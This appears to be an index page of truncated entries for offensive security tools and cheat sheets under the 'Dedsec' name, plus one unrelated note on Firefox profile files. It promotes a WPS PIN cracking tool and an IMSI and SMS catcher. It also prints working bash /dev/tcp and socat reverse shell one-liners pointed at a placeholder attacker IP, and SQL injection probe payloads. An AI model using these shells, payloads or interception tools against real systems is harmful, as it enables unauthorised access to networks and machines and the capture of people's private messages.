-
Dedsec Wifi
DEDSEC WIFI DEDSECWIFI has been designed to be a robust and practical attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a wide variety of access points and WPS implementations. YOUTUBE VIDEO https://youtu.be/idMD4eOUoAQ USAGE sudo python3 dedsec.py INSTALL git clone...
-
Dedsec Catcher
DEDSEC CATCHER is python web based tool which use for capturing imsi numbers and sms and also you able to see sms and imsi on any device using your favorite browser and it’s make easy to capture sms and imsi numbers for those who not have much knowledge about gsm...
-
Reverse Shell
REVERSE_SHELL_CHEAT_SHEET Bash Reverse Shells exec /bin/bash 0&0 2>&0 0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196 exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1 socat Reverse Shell socat tcp:ip:port exec:'bash -i'...
-
Sql Injection
SQL-Injection-cheat-sheet first try to figure out the vulnerable parameter NOTE: If it’s a GET request don’t forget to url encode the characters. param=' --> try to get error param=" --> try to get error param=' or 1=1 --> try if it works param=' or 1=0 --> check if it returns...
-
Firefox Data Loss Problem
firefox data loss problem to copy old firefox data on new firefox application Bookmarks, Downloads and Browsing History: places.sqlite This file contains all your Firefox bookmarks and lists of all the files you've downloaded and websites you’ve visited. bookmarkbackups This folder stores bookmark backup files, which can be used to...